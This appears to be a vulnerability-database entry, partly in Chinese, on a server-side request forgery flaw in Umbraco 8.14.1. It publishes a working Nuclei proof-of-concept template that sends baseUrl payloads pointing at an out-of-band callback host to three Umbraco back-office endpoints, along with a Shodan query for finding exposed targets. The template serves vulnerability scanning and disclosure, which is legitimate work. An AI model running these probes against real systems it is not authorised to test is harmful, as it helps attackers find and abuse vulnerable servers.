umbraco-base-ssrf: Umbraco 8.14.1 - baseUrl Server-Side Request Forgery (SSRF)

日期: 2025-08-01 | 影响软件: Umbraco | POC: 已公开

漏洞描述

Umbraco 8.1.4.1 allows attackers to use the baseUrl parameter to several programs to perform a server-side request forgery (SSRF) attack.

PoC代码[已公开]

id: umbraco-base-ssrf

info:
  name: Umbraco 8.14.1 - baseUrl Server-Side Request Forgery (SSRF)
  author: dhiyaneshDk
  severity: medium
  description: Umbraco 8.1.4.1 allows attackers to use the baseUrl parameter to several programs to perform a server-side request forgery (SSRF) attack.
  reference:
    - https://www.exploit-db.com/exploits/50462
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 6.8
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 3
    shodan-query: http.html:"Umbraco"
  tags: oast,edb,ssrf,umbraco

http:
  - method: GET
    path:
      - '{{BaseURL}}/umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=http://{{interactsh-url}}'
      - '{{BaseURL}}/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=http://{{interactsh-url}}/'
      - '{{BaseURL}}/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=http://{{interactsh-url}}/'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: dsl
        dsl:
          - "len(body_1)==0"
          - "len(body_2)==0"
          - "len(body_3)==0"
# digest: 4a0a0047304502200cbb8713d9f425010536109f4ca0339536122291c5a0b3f07d1e873fc8701d8e022100b83a29c51ca04f2f3f57a2e388e493fa7df7867e2bfb16a393ebbe50f68fa399:922c64590222798bb761d5b6d8e72950

相关漏洞推荐